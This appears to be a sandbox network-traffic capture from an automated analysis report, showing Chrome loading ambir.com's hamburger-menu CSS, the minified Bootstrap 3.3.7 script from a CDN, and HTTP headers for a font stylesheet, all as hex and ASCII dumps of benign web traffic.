                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 20 72 6f 74 61 74 65 59 28 31 38 30 64 65 67 29 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 78 79 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 31 30 70 78 2c 20 30 29 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 78 79 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 2d 31 30 70 78 2c 20 30 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 3b 20 7d 0a 0a 2f 2a 0a 20 20 20 2a 20 33
                                                                                                                                                                                              Data Ascii: rotateY(180deg); } .hamburger--3dxy.is-active .hamburger-inner::before { transform: translate3d(0, 10px, 0) rotate(45deg); } .hamburger--3dxy.is-active .hamburger-inner::after { transform: translate3d(0, -10px, 0) rotate(-45deg); }/* * 3
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 2d 72 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 38 70 78 2c 20 30 2c 20 30 29 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 30 2e 37 2c 20 31 29 3b 20 7d 0a 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 61 72 72 6f 77 2d 72 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 38 70 78 2c 20 30 2c 20 30 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 20 73 63 61 6c 65 28 30 2e 37 2c 20 31 29 3b 20 7d 0a 0a 2f 2a 0a 20 20 20 2a 20 41 72 72 6f 77 20 41 6c 74 0a 20 20 20 2a
                                                                                                                                                                                              Data Ascii: -r.is-active .hamburger-inner::before { transform: translate3d(8px, 0, 0) rotate(45deg) scale(0.7, 1); }.hamburger--arrow-r.is-active .hamburger-inner::after { transform: translate3d(8px, 0, 0) rotate(-45deg) scale(0.7, 1); }/* * Arrow Alt *
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 38 70 78 2c 20 2d 31 30 70 78 2c 20 30 29 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 30 2e 37 2c 20 31 29 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 74 6f 70 20 30 2e 31 73 20 65 61 73 65 2c 20 74 72 61 6e 73 66 6f 72 6d 20 30 2e 31 73 20 30 2e 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 39 35 2c 20 30 2e 30 33 2c 20 30 2e 36 38 35 2c 20 30 2e 32 32 29 3b 20 7d 0a 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 61 72 72 6f 77 61 6c 74 2d 72 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e
                                                                                                                                                                                              Data Ascii: : 0; transform: translate3d(8px, -10px, 0) rotate(45deg) scale(0.7, 1); transition: top 0.1s ease, transform 0.1s 0.1s cubic-bezier(0.895, 0.03, 0.685, 0.22); }.hamburger--arrowalt-r.is-active .hamburger-inner::after { bottom: 0; transform: tran
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 72 67 65 72 2d 69 6e 6e 65 72 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 62 6f 72 69 6e 67 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 62 6f 72 69 6e 67 2e 69 73 2d 61 63 74 69 76 65 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 2d 39 30 64 65 67 29 3b 20 7d 0a 0a 2f 2a 0a 20 20 20 2a 20 43 6f 6c 6c 61 70 73 65 0a 20
                                                                                                                                                                                              Data Ascii: rger-inner { transform: rotate(45deg); } .hamburger--boring.is-active .hamburger-inner::before { top: 0; opacity: 0; } .hamburger--boring.is-active .hamburger-inner::after { bottom: 0; transform: rotate(-90deg); }/* * Collapse
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 66 6f 72 6d 20 30 2e 31 33 73 20 30 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 31 35 2c 20 30 2e 36 31 2c 20 30 2e 33 35 35 2c 20 31 29 3b 20 7d 0a 0a 2f 2a 0a 20 20 20 2a 20 43 6f 6c 6c 61 70 73 65 20 52 65 76 65 72 73 65 0a 20 20 20 2a 2f 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 63 6f 6c 6c 61 70 73 65 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 20 7b 0a 20 20 74 6f 70 3a 20 61 75 74 6f 3b 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 30 2e 31 33 73 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 31 33 73 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72
                                                                                                                                                                                              Data Ascii: form 0.13s 0.25s cubic-bezier(0.215, 0.61, 0.355, 1); }/* * Collapse Reverse */.hamburger--collapse-r .hamburger-inner { top: auto; bottom: 0; transition-duration: 0.13s; transition-delay: 0.13s; transition-timing-function: cubic-bezier
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 20 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 38 2c 20 2d 30 2e 35 35 2c 20 30 2e 32 36 35 2c 20 31 2e 35 35 29 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 65 6c 61 73 74 69 63 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 31 32 35 73 20 30 2e 32 37 35 73 20 65 61 73 65 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 65 6c 61 73 74 69 63 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 74 72 61 6e 73 69 74
                                                                                                                                                                                              Data Ascii: transition-timing-function: cubic-bezier(0.68, -0.55, 0.265, 1.55); } .hamburger--elastic .hamburger-inner::before { top: 10px; transition: opacity 0.125s 0.275s ease; } .hamburger--elastic .hamburger-inner::after { top: 20px; transit


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.549721104.18.10.2074431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:14 UTC575OUTGET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                                              Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC947INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CDN-PullZone: 252412
                                                                                                                                                                                              CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31919000
                                                                                                                                                                                              ETag: W/"5869c96cc8f19086aee625d670d741f9"
                                                                                                                                                                                              Last-Modified: Mon, 25 Jan 2021 22:04:00 GMT
                                                                                                                                                                                              CDN-ProxyVer: 1.04
                                                                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                                                                              CDN-CachedAt: 01/09/2024 03:02:20
                                                                                                                                                                                              CDN-EdgeStorageId: 1029
                                                                                                                                                                                              timing-allow-origin: *
                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              CDN-Status: 200
                                                                                                                                                                                              CDN-RequestId: 019d1a0c03a5cc2a4fb18ea24d644a2a
                                                                                                                                                                                              CDN-Cache: HIT
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 5300818
                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f72a96a32d0-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:15 UTC422INData Raw: 37 63 30 30 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e
                                                                                                                                                                                              Data Ascii: 7c00/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 75 74 20 6c 6f 77 65 72 20 74 68 61 6e 20 76 65 72 73 69 6f 6e 20 34 22 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 2c 62 3d 7b 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 3a 22 77 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 4d 6f 7a 54 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 20 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65
                                                                                                                                                                                              Data Ascii: ut lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitione
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 73 65 2e 62 73 2e 61 6c 65 72 74 22 29 29 2c 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 28 67 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6e 22 29 2c 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 67 2e 68 61 73 43 6c 61 73 73 28 22 66 61 64 65 22 29 3f 67 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 63 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 63 28 29 29 7d 3b 76 61 72 20 65 3d 61 2e 66 6e 2e 61 6c 65 72 74 3b 61 2e 66 6e 2e 61 6c 65 72 74 3d 62 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 64 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d
                                                                                                                                                                                              Data Ascii: se.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 63 74 69 76 65 22 29 29 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 63 2e 70 72 6f 70 28 22 74 79 70 65 22 29 26 26 28 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 29 21 3d 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 26 26 28 61 3d 21 31 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 63 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 61 26 26 63 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 74 68 69 73 2e
                                                                                                                                                                                              Data Ascii: ctive")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 65 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 24 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 62 6f 61 72 64 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6b 65 79 64 6f 77 6e 2c 74 68 69 73 29 29 2c 22 68 6f 76 65 72 22 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 75 73 65 26 26 21 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 26 26 74 68 69 73 2e 24 65 6c 65 6d
                                                                                                                                                                                              Data Ascii: ed=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$elem
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 65 28 22 73 6c 69 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 74 6f 28 61 29 7d 29 3a 63 3d 3d 61 3f 74 68 69 73 2e 70 61 75 73 65 28 29 2e 63 79 63 6c 65 28 29 3a 74 68 69 73 2e 73 6c 69 64 65 28 61 3e 63 3f 22 6e 65 78 74 22 3a 22 70 72 65 76 22 2c 74 68 69 73 2e 24 69 74 65 6d 73 2e 65 71 28 61 29 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7c 7c 28 74 68 69 73 2e 70 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 6e 65 78 74 2c 20 2e 70 72 65 76 22 29 2e 6c 65 6e 67 74 68 26 26
                                                                                                                                                                                              Data Ascii: ))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 29 2c 69 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 7d 2c 30 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 29 3a 28 65 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 66 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 73 6c 69 64 69 6e 67 3d 21 31 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 6d 29 29 2c 67 26 26 74 68 69 73 2e 63 79 63 6c 65 28 29 2c 74 68 69 73 7d 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3b 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3d
                                                                                                                                                                                              Data Ascii: ),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 3d 22 63 6f 6c 6c 61 70 73 65 22 5d 5b 68 72 65 66 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 2c 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 5d 5b 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 27 2b 62 2e 69 64 2b 27 22 5d 27 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 65 6e 74 3f 74 68 69 73 2e 24 70 61 72 65 6e 74 3d 74 68 69 73 2e 67 65 74 50 61 72 65 6e 74 28 29 3a 74 68 69 73 2e 61 64 64 41 72 69 61 41 6e 64 43 6f 6c 6c 61 70 73 65 64 43 6c 61 73 73 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 24 74 72 69 67 67 65 72 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 6f 67 67 6c 65 26 26 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 3b 64 2e 56
                                                                                                                                                                                              Data Ascii: ="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.V
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 74 79 70 65 2e 68 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 29 7b 76 61 72 20 62 3d 61 2e 45 76 65 6e 74 28 22 68 69 64 65 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 3b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 62 29 2c 21 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 64 69 6d 65 6e 73 69 6f 6e 28 29 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 63 5d 28 29 29 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64
                                                                                                                                                                                              Data Ascii: type.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.add
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 20 65 3d 61 28 74 68 69 73 29 3b 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 7c 7c 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 66 3d 62 28 65 29 2c 67 3d 66 2e 64 61 74 61 28 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 2c 68 3d 67 3f 22 74 6f 67 67 6c 65 22 3a 65 2e 64 61 74 61 28 29 3b 63 2e 63 61 6c 6c 28 66 2c 68 29 7d 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61 72 20 63 3d 62 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 63 7c 7c 28 63 3d 62 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 63 3d 63 26 26 2f 23 5b 41 2d 5a 61 2d 7a 5d 2f 2e 74 65 73 74 28 63 29 26 26 63 2e 72 65 70 6c 61
                                                                                                                                                                                              Data Ascii: e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.repla


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.549722141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:15 UTC581OUTGET /wp-content/themes/ambir/css/font-awesome.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-9226"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13803
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f76185e4357-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
